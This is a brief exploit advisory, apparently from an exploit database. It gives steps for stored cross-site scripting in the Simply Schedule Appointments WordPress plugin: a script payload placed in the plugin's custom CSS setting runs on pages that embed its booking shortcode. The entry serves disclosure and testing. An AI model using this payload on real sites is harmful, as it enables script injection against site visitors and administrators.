## https://sploitus.com/exploit?id=WPEX-ID:12062D78-7A0D-4DC1-9BD6-6C54AA6BC761
Navigate to style settings: https://example.com/wp-admin/admin.php?page=simply-schedule-appointments%2F#/ssa/settings/styles
Put the following payload as "CUSTOM CSS": </style><script>alert(1)</script>
The XSS will be triggered in pages/posts where the shortcode for any appointment ([ssa_booking type=]) is embed